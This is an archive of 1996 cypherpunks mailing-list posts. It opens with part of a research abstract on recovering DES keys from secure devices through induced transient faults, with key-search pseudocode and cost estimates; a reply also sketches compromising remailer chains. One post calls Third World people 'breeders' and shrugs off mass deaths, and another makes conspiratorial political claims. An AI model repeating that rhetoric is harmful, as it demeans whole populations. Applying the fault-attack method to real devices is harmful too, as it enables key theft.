abuses from (well-chosen by the opponent) messages m (see
Biham-Shamir, Matsui, Vaudenay, ...) or not so random numbers.
One necessary condition is to avoid the discovery of k by exhaustive
key search: such a general search algorithm is now described.

Key search algorithm:
    Given m, c
    Enumerate all candidate keys i from K
      Compute f(m, i) = c_i 
      If c_i = c then (output i and stop)
    End of loop.

Mean work factor: N / 2.

Indeed, if we suppose that the key is unique for each pair (m, c) (it is not
true for DES: they are sometimes collisions) then the number of
computations of f is N/2 for the mean case and N for the worst case. 
The goal of this paper is to show how to improve such a complexity by 
the use of (randomly activated) transient faults in the secure device.

Model 1: Single fault in the secret key

 - Working hypothesis:
   the opponent is able to modify at a random location one bit of the
   key k (the new transient key is then  k*) and to get the correct result of f(m, k*); 
   after the reset of the secure device by the opponent, the internal
   secret key is again the correct one k. We suppose that the random 
   modification is equidistributed on all n bits of the key k.

 - Key search algorithm: given m,

   1. Physical attack of the secure device:
      Obtain the n possible pairs (m, c_j) where c_j is equal to f(m, k_j);
      k_j is the modified key k with the jth bit being flipped;
      We need about n*log n "questions" to obtain the n different
      pairs (by the coupon collector paradox: in some way the dual of
      the birthday paradox), that is, if f is the  DES for instance, about 300
      accesses to the secure device.

   2. Enumerative key search on an external key search machine:
      Given m, the c_j's
      Enumerate (pseudo-) randomly all candidate keys i from K
        Compute f(m, i) = c_i 
        If c_i = one of c_j's then (output i^*=i and stop)
      End of loop.

   3. Key correcting algorithm on an external computer:
      Given m, i^*, c,
      Enumerate the n values i coming from i^* with one flipped bit at
      every n possible positions
        Compute f(m, i) = c_i
        if c_i = c then (output i and stop)  !the secret key is found!
      End of loop.

Mean work factor: (N / (2*n)) + n.

Indeed, the first step is very fast, the second step needs the mean
work factor of the exhaustive key search divided by the number of bits
of the key (if we suppose that the modified keys are randomly distributed 
in the key set K) and the last step needs indeed n computations of f.

For DES it means about 2^49 computations: let us recall that one
FPGA device in one proposed implementation (see van Oorschot and
Wiener) is able to do about 2^26 computations of DES, with key change,
each second (using a pipelined implementation it is possible to
compute a DES at each clock tick and we here suppose a very possible 
clock of 65 MHz). It means that one secret key will be recovered by
such a small , accessible and inexpensive machine
in 2^23 seconds, that is, less than 4 months. With p FPGAs working in
parallel that time will be divided by p. The comparison operation
in step 2 needs a modification of such a machine (a very easy step
in software): it is a simple modification and thanks to the paper [Desmedt,
Quisquater, EUROCRYPT '87] it is possible to implement it in the case of many
c_j's without any large expense and using a very simple hash (non 
cryptographic) function.

Model 2: Multiple faults in the secret key

 - Working hypothesis:
   The opponent is able to modify at random locations one or several bits of the
   key k (the new transient key is k*) and to get the correct result of f(m, k*); 
   after the reset of the secure device, the internal secret key is
   again k. We suppose that the random modifications are equidistributed on all n
   bits of the key k. The main idea is that the opponent is able with
   a high probability to change randomly few bits of the secret key.

It is easy to adapt the key search algorithm in that context.
The complexity of the attack is directly related to the number of
modified keys. The step 3 is also easy: if the key change is too
large in relation to the number of flipped bits, it is sometimes
necessary to skip the search and to begin a new one.

Model 3: Attacking several secret keys in parallel using several
secure devices

It is easy to see that the first secret key will be found by a number
of computations equal to the number needed for the two first models
divided by the number of secure devices used in parallel. It means
a very fast discovery in case of a massive attack.

In the complete paper we will explain 
- - how to filter efficiently the noise (transient errors with useless output),
- - how to combine such an attack with the one by Biham and Shamir,
- - how to resist to these attacks without expensive computations by the
  secure device, 
- - how this attack is useful to know for public key cryptosystems.

Conclusion
We describe a new use of the attack by transient fault in a secure
device: without any new protection and if this attack is feasible
it means that a secret key will be obtained by about N / log (N) computations
                                                            2
(or less!) instead of N/2 computations by the normal exhaustive keysearch.
In that case this attack is really shortening your keys.






























































------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "'Mark' M.J. Saarelainen" <mjsus@ix.netcom.com>
Date: Wed, 23 Oct 1996 16:02:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Encryption Survey Summary
Message-ID: <2.2.16.19961023225513.278f3148@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



10/23/96

Dear Receiver,

I  completed a brief survey (SURVEY: Encryption in Commercial Enterprises)
few weeks
ago. I received quite good feedback and responses. I have now developed a
short summary of
all these responses. If you like to receive this summary, you can send me
your e-mail message.
My e-mail address is mjsus@ix.netcom.com - please, write in the subject of
your message:
"Encryption Survey Summary". Please, include your name and
company/organization in your
message - thanks in advance.

Best regards,

Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jy@jya.com>
Date: Wed, 23 Oct 1996 16:22:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: TIM_ely
Message-ID: <1.5.4.32.19961023232135.00686a34@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 Two reports lagging the attack on tamperproof devices
 post last night from the Info Sec Group of NUS (which
 we've put at: http://jya.com/isghak.htm):


 10-22-96. Reu:

 "Singapore scientists invent secure Internet system"

 The new system, developed by the NUS team in
 collaboration with several banks for Singapore at a cost of
 Singapore $500,000 (US$355,000), used smartcard technology
 which allowed the transmission of hidden digital signatures.
 Sponsors of the new system include Singapore's four large banks
 -- Development Bank of Singapore, Oversea-Chinese Banking
 Corp Ltd, Overseas Union Bank Ltd, United Overseas Bank Ltd
 -- as well as Singapore Telecommunications Ltd and Citicorp's
 Citibank.

 10-22-96. PrNe:

 Biometric Technology Firm Refutes Reports of Vulnerability 
 to Smart Card
 
 A biometric facial recognition protects smart cards from tampering 
 by denying access even if digital codes are obtained. According 
 to the company's president, recent  reports from U.S. and Israeli 
 researchers on ways to crack encryption codes are needlessly 
 alarming security managers in government and industry.

 -----

 http://jya.com/timely.txt  (4 kb for 2)

 ftp://jya.com/pub/incoming/timely.txt

 TIM_ely









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 23 Oct 1996 19:38:33 -0700 (PDT)
To: project_31@alias.cyberpass.net
Subject: Re: Call for Discussion - Time-Delay Protocol
Message-ID: <199610240234.WAA13669@caig1.att.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:07 AM 10/23/96 -0700, project_31@alias.cyberpass.net wrote:
>Very simply put, it is desired to put an encrypted, paragraph-length
>message into ubiquitous public distribution, contained in an explanatory
>plaintext.
>On a predetermined date stated in the plaintext, the passphrase is to be
>released and the parties holding the message may decrypt the cyphertext
>and know its contents.
[Threats: content-leaks, counterfeiting/spoofing, alteration]
>        1.  A large-modulus PGP public key is prepared prior to the
>            experiment and placed on (a) the keyservers and (b) at an
>            "authenticating" website of neutral interest and good
>            reputation.

This isn't enough - keyservers are NOT a substitute for the
Web Of Trust.  You probably need to have the authenticating key
signed by other well-known-in-the-target-community keys.
I don't know if you plan to use one authenticating public key
for future jobs, or use a different one each time; in the latter
case you'll also want to have a key to sign that one with.

>        2.  The critical message is encrypted conventionally (IDEA) in
>            ASCII format with a large passphrase and included in the
>            explanatory plaintext, which also includes the
>            authenticating key ID hexnumber and fingerprint, and
>            instructions on how to obtain the authenticating key.

Fingerprint is critical - otherwise you're subject to the "0xdeadbeef" attack.
You could also include the key itself in the signed message, if you don't
mind a bit of extra volume.

>        3.  The entire plaintext message is clearsigned with the
>            authenticating public key, and the resulting textfile is
>            widely distributed.


>        1.  How may this protocol be improved?
>        2.  What are the security flaws in this protocol?
>        3.  May this protocol be simplified without compromising
>            security?

The main alternative to PGP keys is Haber&Stornetta's "Surety" notary system -
they use trees of hashes to establish that a given document was 
authenticated at a given time, making the trees publicly available,
and the weekly master hash gets printed in the New York Times classifieds
weekly.
At minimum, you may want to notarize your PGP key that way.
        http://www.surety.com/


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hard Media <zaid@hardnet.co.uk>
Date: Wed, 23 Oct 1996 12:04:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: wired wankers
Message-ID: <v01520d01ae94264879d0@[158.152.61.59]>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone read the cover article in last months US Wired? About why Walter
Wriston , the ex-head
of Citibank, is acting like a cypherpunk????

I can't believe that a man responsible for countless third world deaths is
being called a cypherpunk
by Wired!!! Citibank is a major player in the third world debt
crisis...this seems to be news for
Thomas Bass, who interviewed him...then Bass goes on to ask if "Walter" has
made any "bad loans"
ie to dictators and other nasty sorts....jeez sorry but there's naivity and
there's stupidity

....seems like very few people know who or what cypherpunks are - good or bad?

Zaid






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 23 Oct 1996 20:01:39 -0700 (PDT)
To: Hard Media <zaid@hardnet.co.uk>
Subject: Re: wired wankers
In-Reply-To: <v01520d01ae94264879d0@[158.152.61.59]>
Message-ID: <326EDB3C.52F1@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Hard Media wrote:
> Did anyone read the cover article in last months US Wired? About why Walter Wriston,
> the ex-head of Citibank, is acting like a cypherpunk????
> I can't believe that a man responsible for countless third world deaths is being
> called a cypherpunk by Wired!!! Citibank is a major player in the third world debt
> crisis...this seems to be news for Thomas Bass, who interviewed him...then Bass goes
> on to ask if "Walter" has made any "bad loans" ie to dictators and other nasty sorts
> ...jeez sorry but there's naivity and there's stupidity
> ....seems like very few people know who or what cypherpunks are - good or bad?

Now, now.  Just because they acted naive, you didn't buy it, did you?

There's an old joke: What's green and grows and has four wheels?
                     Grass - I lied about the wheels.

Cypherpunk is a problem for the establishment, and now that it's becoming fashionable, 
it's time to be co-opted.  Are you ready to be co-opted?  Don't bend over too far!

Short history of Wriston/Reagan ripoff: 1982, Wriston (speaking of Willie Sutton, "I rob 
banks because that's where the money is") said "I look out over the American landscape 
and I see 1.2 trillion dollars in Savings and Loans...." (quote approximate).  Enter 
neo-Nazi Ronald Reagan with Fritz Kraemer's "former" secretary in tow, and Reagan goes 
on video saying "Well, looks like we hit the jackpot".  Yowzuh!

Then they turned their sights on Japan, with 12 trillion in the stock market and 
Japanese banks, and I guess you know how that went.

These are very serious folks.  The kind of guys who can arrange war-crimes trials 
(Nurnburg, et al) as a smokescreen for their real mission.  Don't get in their way
unless you have an angel on your side.  An angel with a bag of cash, actually.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 23 Oct 1996 19:57:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: "Countless third world deaths"--who cares?
In-Reply-To: <v01520d01ae94264879d0@[158.152.61.59]>
Message-ID: <v03007800ae949a85b875@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:51 PM +0000 10/23/96, Hard Media wrote:
>Did anyone read the cover article in last months US Wired? About why Walter
>Wriston , the ex-head
>of Citibank, is acting like a cypherpunk????
>
>I can't believe that a man responsible for countless third world deaths is
>being called a cypherpunk
>by Wired!!! Citibank is a major player in the third world debt
>crisis...this seems to be news for

He sounds a lot like a Cypherpunk to me.

As to "countless third world deaths" due to debt...I'm skeptical that
Citicorp had much to do with countless deaths. Money was lent for economic
development projects...some worked, some didn't. Lenders of money don't
"cause" deaths. People are responsible for their own actions, mostly. If
their governments are corrupt, they need to replace those governments.

(Besides, the Third World is extremely good at reproduction, and is way,
way ahead of the curve in terms of overpopulating themselves to extinction.
A few tens of millions of deaths are as nothing compared to the 7,000
million that now exist, increasing by 100+ million every year.)

Cypherpunks is about finding ways that the breeders cannot seize the assets
of those who save, who plan for the future, and who are not sheep.

If this sounds harsh, so be it. Cypherpunks is not about redistributing
wealth. Nor is about putting lenders of money in prison because they have
allegedly caused "countless third world deaths."


--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 23 Oct 1996 17:11:41 -0700 (PDT)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Netescrow & Remailers?
In-Reply-To: <v03007800ae9417ae8f94@[207.167.93.63]>
Message-ID: <199610240117.UAA05092@homeport.org>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:

| I don't think "escrow" is the salient feature of what Adam is hinting at,
| or at least it's now what I'm focussing on here. Rather, I think the really
| intriguing thing is using _logical_ names for remailers, and not
| necessarily tying them to specific accounts, specific account owners, or
| specific sites. ("Call by name," if you will.) This could make remailers
| more persistent.

Netescrow is a system that Matt Blaze proposed to do key escrow such
that the recovery of a key must be public.

| At 10:54 AM -0500 10/23/96, Adam Shostack wrote:
| >	Would it make remailers more reliable to use a netescrow
| >system, so that if a remailer goes offline, the others can request its
| >keys, and continue moving its messages?
| >
| >	To me, reliability is as large a problem as UI.  If the next
| >Mixmaster is going to do direct IP transport, reliability could
| >increase as a problem.
| 
| This seems like a very good idea. I have an idea for transitioning from the
| current "physical site name" approach remailers are using, to perhaps a
| "logical site name," where logical names (like "AliceRemailer") would be
| aliased or mapped (through a collectively-maintained, or Raph
| Levien-maintained (:-}) list of logical-to-physical site names. Thus, if
| the physical site or physical account name which maintained the
| "AliceRemailer" remailer and keypair were to vanish or have the account
| yanked, another site/account could "inherit" the keypair (by suitable
| arrangements) and the persistence of the site AliceRemailer would be
| ensured.

	That requires prior arrangement.  The nice thing about
Netescrow is if the remailer goes down in flames, and Raph and Lance
and Matt call for its key to be recovered, everything sent before the
remailer went down, intended to chain through it, can still go
through, albeit with a delay.

| But I have some questions about possible implementations. Suppose a
| remailer is named "Alice@foo.bar," or "Alice" for short. Alice has a key,
| AliceKey.
| 
| Now imagine that the Alice remailer goes down, for whatever reason. Alice
| (the person or owner) can "authorize the release of AliceKey" to another
| remailer of her choosing (or by prior arrangement, as a fallback remailer).
| So, Bob takes over Alice's traffic.
| 
| However, some questions for this scenario:
| 
| -- users will have "Alice@foo.bar" in their scripts, or chains, or
| whatever. So, having Bob have AliceKey is not ipso facto very useful. If
| users have to respecify a site name, they might as well just switch to the
| BobPublicKey, for example.

	If thats mixmaster@acme.alias.net, then alias.net can use MX
records to redirect the mail.

| -- on the other hand, if a "logical name" could be used, where users see a
| name like "AliceRemailer" instead of "Alice@foo.bar," then a remapping of
| AliceRemailer to whatever site is still up and handling her private key
| could provide a seamless transtion.

	Logical mappings are already provided by MX records.

| I don't see that this would create new security problems, as the private
| keys for a logical remailer are only passed on to another site if and when
| the remailer owner _wants_ to. (This is back to the familiar theme that the
| owner of a private key can pretty do what he wants, including passing it on
| to others.)

	Or if the remailer operator is disappeared; this is the win to
Netescrow for remailers.  The key can be recovered, but this needs to
happen in a public way.  If the operator is still around, they can
broadcast a "Hey! Don't do that" message.

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Remailer Administrator <mix-admin@nym.alias.net>
Date: Wed, 23 Oct 1996 17:21:26 -0700 (PDT)
To: Derek Atkins <warlord@ATHENA.MIT.EDU>
Subject: Re: MD5?
In-Reply-To: <199610231610.MAA14566@charon.MIT.EDU>
Message-ID: <199610240020.UAA01788@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Derek Atkins <warlord@ATHENA.MIT.EDU> writes:

> 
> > 	well, that is alright, &c.   BUT WHEN WILL 3.0 RELEASE?
> >     it has been imminent for at least 2 years.
> 
> It'll be released when it's done, dammit!  And it's almost done!
> Currently, I'm tracking down a few bugs, and a few details need to get
> solidified, but other than that I have it working on my desktop and I
> use it almost every day.
> 
> It's still got some testing to do, and it needs to get packaged up.
> And it still needs to get cleaned up a lot (the UI ain't pretty --
> even compared to 2.6.2!)  This is what is taking so long.
> 
> Come on, EVERY SINGLE LINE OF CODE WAS RE-WRITTEN!  And there are
> about 60000 lines in PGP3!  That's a lot of work, and the
> 70-30/80-20/90-10 rule is hitting hard.
> 
> It's coming.  We're trying to get it out as fast as we can.  But
> we're not going to sacrifice quality for a little bit of time.

Is there any way to I could possibly get a snapshot of the source code
if I agree not to bug you about it?  I have some servers that use PGP
pretty heavily, and will come under immediate preassure to upgrade to
3.0 as soon as it is released.  Any head start I can get would be
really really helpful.

While you may be offering a similar command line interface, I have
been forced to make heavy-duty use of what might turn out to be just
quirks in the 2.6.2 implementation.  For example, to encrypt with the
first key on a keyring, when I don't know the ID of that key, I use
the ID "0x" which just happens to work in 2.6.2 but has no reason to
work in 3.0.  In many places I also just rely on text processing
the standard output and error of PGP to look for particular strings.
Clearly this kind of thing is not going to be robust against against a
complete rewrite of the source code.

I understand that at this point the last thing you want is a whole
bunch of questions from beta testers to slow you down.  However, for
some people a look at the source code would be incredibly useful, even
if they can't ask you for any help with it.

Is there any way to work something like this out?

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 23 Oct 1996 13:28:00 -0700 (PDT)
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: PIS_son
In-Reply-To: <326D5494.334A@netscape.com>
Message-ID: <Pine.LNX.3.94.961023202515.389C-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Jeff Weinstein wrote:

> John Young wrote:
> > 
> >    10-17-96, BuWi:
> > 
> >    "Apple, IBM, JavaSoft, Motorola, Netscape, Nortel, Novell,
> >    RSA, and Silicon Graphics Announce PICA Crypto-Alliance"
> > 
> >       The PICA specification will also be designed to make the
> >       task of developing differing domestic and exportable
> >       security requirements much easier. [GAK alliance 2.]
> 
>   John, I think you are misreading the intent here.  By making
> it easier to develop separate domestic and exportable
> versions of a product, we foil the government's attempt to
> force weak domestic encryption because it is too much work to
> maintain two different versions.
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 

Intents are arguments used by idealists.  Netscapes screwing us over.

 --Deviant
Swap read error.  You lose your mind.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 23 Oct 1996 17:29:32 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: Eric Blossom - URL
Message-ID: <Pine.SUN.3.94.961023202752.4131A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland

---------- Forwarded message ----------
Date: Tue, 8 Oct 1996 20:59:28 -0700 (PDT)
From: Lucky Green <shamrock@netcom.com>
To: cypherpunks@toad.com
Cc: Paulo Barreto <pbarreto@uninet.com.br>
Subject: Re: 2Re: Best-of-Crypto


Eric Blossom is eb@comsec.com. His URL is http://www.comsec.com/ check 
out his nifty bump-in-the-cord 3DES phone encryption device.

--Lucky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Wed, 23 Oct 1996 21:17:47 -0700 (PDT)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Netescrow & Remailers?
Message-ID: <Pine.BSF.3.91.961023205431.760A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>        Would it make remailers more reliable to use a netescrow
>system, so that if a remailer goes offline, the others can request its
>keys, and continue moving its messages?

Do you operate a malicious remailer? Have you just recieved a message from
a person, encrypted for another remailer? Want to know who this person is
communicating with? Bomb the next remailer in the chain or do whatever
else to force it to reveal it's keys. Once that's done, you can peel away
that layer of encryption and then go to work on bombing the next remailer
in the chain to obtain it's keys. Repeat until you've peeled off all the
layers of remailer encryption and can see the final destination address. 

Tell us, what have you done with the _real_ Adam Shostack? ;P




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 23 Oct 1996 19:03:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA Report: Anyone seen this?
Message-ID: <v03007802ae947ac2648c@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Mime-Version: 1.0
Date: Wed, 23 Oct 1996 16:50:18 -0700
From: Somebody
Subject: NSA Report
To: rah@shipwright.com

     I don't recall seeing this report mentioned in any e$pam items, and
     thought you might be interested.  Thanks for all your work on the e$
     lists.

<Somebody's .sig>

______________________________ Forward Header
__________________________________
Subject: 21st Century Banking Alert No. 96-10-17
Author:  "Ledig; Robert" <LEDIGRO@ffhsj.com> at internet
Date:    10/17/96 2:51 PM



21st Century Banking Alert No. 96-10-17
October 17, 1996

National Security Agency Report Raises
Systemic Security Issues Related to Anonymous Electronic Money


     A recent report prepared by the Cryptology Division of the National
Security Agency's Office of Information Security Research and Technology
discusses the potential for security failures in certain electronic cash
systems and their likely consequences.  While demonstrating concern over the
attributes of non-traceable electronic money, the report points out methods
that may be used to minimize security breaches and losses, including
limiting the number of coins that can be affected by a single compromise,
requiring traceability for large transactions or large numbers of
transactions in a given period, and the creation of a mechanism to restore
traceability under certain circumstances.  The report contains an excellent
summary of basic electronic money cryptographic tools, electronic cash
protocols, authentication and signature techniques and related security
issues.



Copyright 1996.  Fried, Frank, Harris, Shriver & Jacobson.
  All rights reserved.
21st Century Banking Alert is a trademark and servicemark
  of Fried, Frank, Harris, Shriver & Jacobson.



--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Greg Kucharo" <sophi@best.com>
Date: Wed, 23 Oct 1996 22:51:58 -0700 (PDT)
To: <tcmay@got.net>
Subject: Re: Holding Netscape's and Microsoft's Feet to the Fire
Message-ID: <199610240551.WAA20670@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


  The truly frightening thing here is that Bill gates has come out more
often on the strong crypto side than Netscape, Apple, IBM and just about
everyone else.  Why is this?  Has Justice crapped on him once too often,
and now he's looking for payback?
  At first I thought that it may be that Microsoft has big financial
transaction plans.  If this were true, they would probably get the leniency
that banks and others get for crypto. 
  So what is it? Here is my theory, if you will indulge me for a minute; It
was a dark and stormy...uh middle of the afternoon in Redmond.  Bill is at
his desk reading the latest sales figures for Windows and Office 95.  "600
million, hot shit! But I grow bored with commonplace software, I need new
money schem..uh challenges".  Somehow Bill finds his way into Building 666
on the Microsoft campus.  The building is home to Microsoft's Security and
Crypto division.  He hails a young minion. "Here my son, what have you done
for me today?" The young man gulps, "Uh well let me see Mr Gates...".
Suddenly Bill notices the boy's shirt. It is black, on the front are
printed the words; "This T-Shirt is a Munition".  Under the words are a few
lines of code.  Because they are not Basic, Bill is confused. He blurts
out,"Say that isn't Java is it!". "No Mr. Gates, it's Perl. This is the RSA
code implemented in it." Bill says,"I see, carry on my boy". The young man
scurries back to his office.
  Suddenly it strikes Gates like the first time he envisioned the DOS
liscening scheme. "Munitions! Hot shit, weapons on a floppy I could make
billions! I could arm the whole world with Microsoft weapons of software
and dominate any governments who got in my way! Then I could have Larry
Ellison and Marc Andressen and any other punks who made fun of me locked
away".  
  I'm sure it didn't happen just this way.  It's quite possible that Bill
gates never says "hot shit".

----------
> From: Timothy C. May <tcmay@got.net>
> To: cypherpunks@toad.com
> Subject: Holding Netscape's and Microsoft's Feet to the Fire
> Date: Tuesday, October 22, 1996 8:59 PM
> 
> At 4:11 PM -0700 10/22/96, Jeff Weinstein wrote:
> >John Young wrote:
> >>
> >>    10-17-96, BuWi:
> >>
> >>    "Apple, IBM, JavaSoft, Motorola, Netscape, Nortel, Novell,
> >>    RSA, and Silicon Graphics Announce PICA Crypto-Alliance"
> >>
> >>       The PICA specification will also be designed to make the
> >>       task of developing differing domestic and exportable
> >>       security requirements much easier. [GAK alliance 2.]
> >
> >  John, I think you are misreading the intent here.  By making
> >it easier to develop separate domestic and exportable
> >versions of a product, we foil the government's attempt to
> >force weak domestic encryption because it is too much work to
> >maintain two different versions.
> 
> Thwarting the True Intent of GAK by ensuring that domestic crypto is
> completely unhampered, unhindered, unlimited, and unGAKked is terribly
> important. A year or so ago, when Netscape folks issued assurances that
the
> "relative convenience" of having one "world version" would not be the
> determining factor, and that Netscape would have two versions (times the
> number of platforms they support), was an incredibly positive
development.
> 
> (And Bill Gates, of the Evil Microsoft, had already isssued scathing
> denunciations of key escrow and mandatory crypto, so MS was already
> effectively in our camp.)
> 
> So, if PICA helps this (along with the Elites Alliance, a rival type),
more
> power to them. I wouldn't be surprised if the Feds try to exert pressure
on
> them to change this purpose that Jeff W. describes. Government will
realize
> that industry consortia are a way to "build consensus" on getting GAK
built
> in to even domestic products. (The renaming of Clipper/Tessera/etc. to
key
> escrow and then to "key recovery" is essential to this strategy....got to
> convince U.S. software companies that Mr. Policeman is Our Friend...not
an
> easy sell.)
> 
> But I wonder if the PICA Alliance will be allowed to pursue this "dual
> strength strategy." Mightn't it be a violation of the ITARs merely to
> _conspire_ to keep domestic crypto unhindered and strong?
> 
> (:-} for the :-}-impaired.)
> 
> Though this is preaching to the choir, it's imperative that Netscape,
> Microsoft, and the Other Minor Players remain committed to _never_
> compromising the security of _domestic_ products....Europe and Asia will
> have to take of themselves, as the true battle always has and always will
> be about the U.S. government's desire to surveil us and tap our
> communications at will.
> 
> (Anyone who doubts this should reread the recent comments of Janet Reno,
> Louis Freeh, Jamie Gorelick, and all the others talking about the need to
> read the communications of criminals and suspected criminals. The real
goal
> is to head off crypto anarchy, as the summary by Black Unicorn made clear
> just a day or two ago.)
> 
> --Tim May
> 
> "The government announcement is disastrous," said Jim Bidzos,.."We warned
IBM
> that the National Security Agency would try to twist their technology."
> [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't
allowed.
>
---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms,
zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information
markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information
superhighway."
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 23 Oct 1996 22:55:13 -0700 (PDT)
To: mjmiski@execpc.com
Subject: Re: Stopping the buying of candidates
Message-ID: <199610240554.WAA28342@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 AM 10/23/96 +0000, Matthew J. Miszewski wrote:
>
>> At 08:13 PM 10/22/96 -0700, Declan McCullagh wrote:
>(snip)
>
>> Sure, you can't keep people from talking.  However, one way to sabotage the 
>> usefulness of telling is to allow everybody else as well to make the same 
>> claim, with essentially no way for the candidates to tell who is REALLY 
>> giving the money.  Make the lie just as credible as the truth, and the 
value 
>> of knowing the truth is destroyed.  If nobody can trust anyone else's word, 
>> then no candidate could know who REALLY ought to be rewarded for a campaign 
>> contribution, breaking the circle of quid-pro-quo.  
>
>Sorry, but this would depend upon equal access to a number of things. 
>Primarily, John Q. Public does not have sufficient real world access 
>to politicians to assert that he is the one who donated.  Lobbyists, 
>OTOH, most certainly do.  Secondly, access to the timing of donations 
>is something only the donor can know.  
>
>"Wink, wink.  Nudge, nudge, Senator.  Look at your account balance 
>tomorrow.  Never forget the National Association of Manufacturers was 
>there for you"  (Obviously a completely random selection 8-)

While I have worked through essentially none of the details, if the system 
can be implemented well enough, all this kind of information will be blinded 
into oblivion.  Donations won't be tallied individually, and news of their 
arrival will be disguised, possibly by limiting the size that is credited to 
the candidate per day and thus in effect splitting up a donation to make it 
"arrive" over a period of a week or two.  Only overall totals will be 
reported, possibly rounded to only two significant figures, and even then 
possibly only on a weekly basis.   


>> The candidate still gets the money, of course, and the contributor is still 
>> free to both donate and speak...separately.  The thing that's been cut off 
>> is the association between the money and the speech...which is exactly what 
>> the problem is, isn't it?
>
>See above for why the connection is not.

Try again.  Rather than trying to prove that a system won't work, why not 
help develop one that will?

>And the problem is 
>generally not money, but rather the delivery of votes.  A candidate 
>will do whatever it takes to get elected.  Often this means $$$ for 
>campaign expenses.  More often it means vote delivery.

But "vote delivery" can't be proven, or even demonstrated with a strong 
degree of assurance.  


>Get rid of the career politician and you get rid of the motivation 
>behind the pursuit of political money and vote delivery. 

I'd LOVE to "get rid of the career politician."  And every other kind of 
politician, as well!


> I hate to 
>actually advocate term limits, but a critical vote in Congress is 
>much harder to control when the rep is only interested in serving the 
>public because there is no chance of re-election.  After all, it is 
>not donations that are the evil here, it is the control of gov't 
>action, right? 

What I consider wrong is that government affects way too large a fraction of 
our lives, without apparent Constitutional justification.  If the government 
at all levels were only, say, 1/10th of its current size, there would be 
much less motivation for corruption.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
